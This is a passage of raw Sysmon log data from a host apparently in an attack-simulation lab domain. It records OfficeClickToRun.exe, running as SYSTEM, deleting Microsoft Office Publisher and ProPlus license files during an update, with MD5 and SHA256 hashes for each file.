Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\PublisherVL_KMS_Client-ul-oob.xrm-msMD5=5A7066CDBA46C38C97893C0CEC5EE201,SHA256=B46B5A83DB3B4ADB637B235F23CE17238E7709FD6E52604F3A2F13521D194CC4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067828Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.720{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\PublisherVL_KMS_Client-ppd.xrm-msMD5=AB7948C33D78538B87FD83265D0424EE,SHA256=C736FF5B17E7AEB4FA92DDE0631215152D5206ACC9BF8C251AE67F575A499388,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067827Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.720{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\PublisherR_Trial-ul-oob.xrm-msMD5=22C94CEB5E908D5E715F59580E3DD875,SHA256=8B4C0655DCDD338C0B681797A3BBE2706D701992EDF4F08CFA7E1156FCEBC972,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067826Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.705{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\PublisherR_Trial-ppd.xrm-msMD5=F799A2C605A1165CF9D6557A1748609D,SHA256=CADA59E6B9AD4446B190868C251F750F49DFF0301B990A9A6D846028EF86D64A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067825Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.705{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\PublisherR_Trial-pl.xrm-msMD5=03B791A7344584F82D72239DE3442439,SHA256=E17989894A51568B347397FB498FC6CAC323584A30F72EBC6F52307727CEB827,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067824Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.705{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\PublisherR_Retail-ul-phn.xrm-msMD5=193A2DDB52A69054EF6B03AE48D8763B,SHA256=C7B51612CBCF79AD740C9479B737D564EED4A934C8AA8351FAC4389A125578F2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067823Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.705{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\PublisherR_Retail-ul-oob.xrm-msMD5=89A0056D1E198FD29944A670B34E8A1D,SHA256=52B35ED9B55AF379A628AB6E242B833BF0AEFC72259CBD79CBF160ADB9D3EE07,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067822Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.705{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\PublisherR_Retail-ppd.xrm-msMD5=06E0B4491B0417A326B3A744F2F34DFD,SHA256=BB24E8CBF96E894E3D9D6A3B22BFA1836C091EAF27E67B9D0FD3DD4092D00F00,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067821Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.705{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\PublisherR_Retail-pl.xrm-msMD5=8E0B7E966116C26BDBEE993AB62CAD68,SHA256=C060CA264ABBFFFA23B130A7774413453313B51C4DEEF72B9E64136CEF287CAD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067820Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.705{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\PublisherR_OEM_Perp-ul-phn.xrm-msMD5=AE9451895A063A18CE8F093A94BA287F,SHA256=920CD02F98DF0ED412B9A82CDAC9734709A350A1D95B3F3EA625C584CA958B77,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067819Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.705{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\PublisherR_OEM_Perp-ul-oob.xrm-msMD5=54C00822E719205CEF7E964972A2C8AE,SHA256=36953358407A9E1D4B5E16B15A9911394598F90ECFB9018F7C828CC8686349D0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067818Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.705{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\PublisherR_OEM_Perp-ppd.xrm-msMD5=6C1E516B0C2EE28ECBE82E53C65D5EB5,SHA256=1EEB1A5CA82A47B12CFB3857DD604C24BE15B24753A14240A92A4B7D648B9ED6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067817Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.705{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\PublisherR_OEM_Perp-pl.xrm-msMD5=574408864FAA5200E44AFFB8DB50D27F,SHA256=4E81DC402A2BAB23BD601A044EEA7939D9CEB09386842895C7624C3E7B775F4B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067816Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.705{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\PublisherR_Grace-ul-oob.xrm-msMD5=8C301F23CD75C7E0CA89D57866338A4C,SHA256=91E30D266F8D7D974A848F03DD8047E419F46A48BFAAD5F59A4E7A98B55ADAA9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067815Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.705{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\PublisherR_Grace-ppd.xrm-msMD5=1D8ADEDFC1C5557421F29A75DFDB3925,SHA256=A56E55C263E405989678E43573097F1C346F7AB5382E8F0E699E0F1ED9578824,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067814Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.705{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\Publisher2019VL_MAK_AE-ul-phn.xrm-msMD5=1145D7E90F200C0E7ABBB4815DD40C89,SHA256=10940489787B374B5EB7E468461368958C45E0D8E99B786715B95B2BA5B6F0EA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067813Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.705{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\Publisher2019VL_MAK_AE-ul-oob.xrm-msMD5=42870642117350D6B7DE2D366645278E,SHA256=9B4B4DAFE0BD270FA21A5DC0AC52D18097DD5820930E9CCF86E99E0208EC611D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067812Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.689{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\Publisher2019VL_MAK_AE-ppd.xrm-msMD5=7C9EC7D4F6EF4A1696895B7CA6341902,SHA256=A45B2894BF6EBD4C65F5A0EA57C4E0EFF7DF22A506128F2EDAEEBE99E81CE434,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067811Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.689{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\Publisher2019VL_MAK_AE-pl.xrm-msMD5=CDAA41C32A2B302BFD3CB6A085EDD3DE,SHA256=3A7E65A324269CD33B8EF00A7248A6E536EDCDF8B853F2644DEF8AA60B8CD177,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067810Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.689{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\Publisher2019VL_KMS_Client_AE-ul.xrm-msMD5=509E175670E810D59955FF66EA94D7E3,SHA256=34E9AABC26F4D6DF97C09A5FF0E118368C9A79C927272C79D13EA761FD4E80D6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067809Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.689{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\Publisher2019VL_KMS_Client_AE-ul-oob.xrm-msMD5=593B6177EE7DD7273ACAE7CE0B06530D,SHA256=EFB5212B6DDF5CCBA13AAEBA53F71DAD7C440F2575ECB12368671AA10E7CE8A5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067808Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.689{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\Publisher2019VL_KMS_Client_AE-ppd.xrm-msMD5=8B2DE4DC6D34DA9D628F862480DD6DD4,SHA256=13AF0B7268FA718D049CFC39A650D1EAB88E416B2887A185CDA2F7AE87A85D9D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067807Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.689{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\Publisher2019R_Trial-ul-oob.xrm-msMD5=7EBF6062954DE60DDD9FA2FDD6433254,SHA256=26B143BF6D95F64A977EBA0FA7E6BA0070438D7A5D148777886C4B01C16B93FF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067806Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.689{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\Publisher2019R_Trial-ppd.xrm-msMD5=A67102E0EA4B57CE790BCC4C9B6358BF,SHA256=98AE07697D7E06F1ED50AC968E269E2F231205BEA5ACB3C097DE8BF5B2724E56,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067805Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.689{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\Publisher2019R_Trial-pl.xrm-msMD5=048A1451933D5C6B452C14B507201220,SHA256=6726F21722FCBF17E5139369B4DE780FC71F8157B08A85208505B942F1411E8C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067804Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.689{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\Publisher2019R_Retail-ul-phn.xrm-msMD5=0E1B8707DA869CF6BBE0CDDB667BE4E3,SHA256=B160EA5F1BC1657E6FCB3801739D1062D66ADD6E122971B258AA12E55502D120,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067803Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.689{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\Publisher2019R_Retail-ul-oob.xrm-msMD5=D29E0145FEDF2AE95D231EC10964AB1F,SHA256=B42C566246F4CCC5F7B1149D700F7FE8C84B72DB6DB405D6672A51FAD8EE14CB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067802Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.689{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\Publisher2019R_Retail-ppd.xrm-msMD5=37F4A577B26587AA47ECE797B1ACEAF4,SHA256=9966A65BA426F78745A23A516C83F43537D26E01800022F693250019223277D6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067801Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.689{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\Publisher2019R_Retail-pl.xrm-msMD5=845E2F0C0D7C3E847D60D91BFABFDB89,SHA256=72EB1AE01DF650FD882F639C4BA0B85A9C42431E47E847B57113A9BA66CADEAB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067800Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.689{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\Publisher2019R_OEM_Perp-ul-phn.xrm-msMD5=5B8AE0DFB0B4C9A3B971203C7E54B186,SHA256=A0108D7CA41DC91C1F45583A29F03A61105C429E50CFB902FD3C0335A90BA9F7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067799Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.673{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\Publisher2019R_OEM_Perp-ul-oob.xrm-msMD5=3E47F69D227E911B2833690369AC08F1,SHA256=A995241FB7ABD15AA0AA5E5B7C9FE9F441C7C2B55612D4158C9EEE00DF8D7291,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067798Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.673{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\Publisher2019R_OEM_Perp-ppd.xrm-msMD5=2548304DB719DEF354873DFE5ACF7A5D,SHA256=0AF429D6D3361C0BE749A54D1471A1F5BFB5F684A6B264C66541A94AF20E9F4A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067797Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.673{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\Publisher2019R_OEM_Perp-pl.xrm-msMD5=79E053F01F87C7C3B23EDFE4966B67ED,SHA256=C9DA33C800CE1DA33489C72E280C643EE13099F80D46464CC5E230C2B1A45873,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067796Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.673{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\Publisher2019R_Grace-ul-oob.xrm-msMD5=61032142F9190E33BE57C56F6227B885,SHA256=F5980F7D9C20B3D404495744FFE1FE7263D2E57201F7F0E387D7F2B1485E18B7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067795Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.673{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\Publisher2019R_Grace-ppd.xrm-msMD5=2BF0CE2A9FD0EFA0608EA39321AC8F76,SHA256=6C14FF0EE8015F408DE16D95443F5B3255D48783A1A3D532BA6E3230C5008302,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067794Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.673{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProPlusVL_MAK-ul-phn.xrm-msMD5=D3A5934CBE762C53FD6562AB838339C3,SHA256=1120742223D6C7B76400278A60517F0A6E6AAD4EB39851DD90C0C699CF247603,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067793Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.673{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProPlusVL_MAK-ul-oob.xrm-msMD5=E9B153732EF8A1F22A37A6C7BA4FE436,SHA256=9435BF25B4F8EFC7C9FC439D48D28B2B3D7402B656D7CC41D10ECD15BA624A9B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067792Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.673{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProPlusVL_MAK-ppd.xrm-msMD5=30B937863C074417BF9AF9DBE554778F,SHA256=4681BED287D0B1CD5ABFBB9053FD9275EA18747D8126E2A0C773ECA8008E6DB4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067791Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.673{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProPlusVL_MAK-pl.xrm-msMD5=1C6D33884433DA190B0B6F6D1C95F211,SHA256=016D65BB8372E339224DD7CD4812EBAE0E72575C987CBAC20EFFDC5E0DC31149,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067790Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.673{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProPlusVL_KMS_Client-ul.xrm-msMD5=F933A56F093813E922EE8E545CE111E2,SHA256=F0CB9737DC16D573F6AE6A3B19A9A7C1DABA8DD5EFD6801EC17382777F5AAF42,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067789Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.673{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProPlusVL_KMS_Client-ul-oob.xrm-msMD5=F8FF1171B9958EE65DDFC3C4F4E59BC1,SHA256=6CFF06E770175938B1CADF86D4A927ACF38C54D04A4E1B4E1F2CCCF48FECF583,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067788Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.673{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProPlusVL_KMS_Client-ppd.xrm-msMD5=F954DDF2F2FA4296455309B09DFCE192,SHA256=19A4DCA221AB237E7B05F5BDA3022A735EC37AE7B254897510348BDDC208717B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067787Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.673{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProPlusR_Trial2-ul-oob.xrm-msMD5=6A1C3A2830141D1538BBBC971ADE8437,SHA256=9C142669AA9D0D4BDC7A41BEDD5DBB8EE675174380D578D7349B73FE4B57A70C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067786Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.673{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProPlusR_Trial2-ppd.xrm-msMD5=11013AE913D102272A5AFD4AE3D320DB,SHA256=C5E67538EE57977EFA5C4C10574747BCFAF7B90B46B176C049C30FF2778D8A92,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067785Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.658{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft 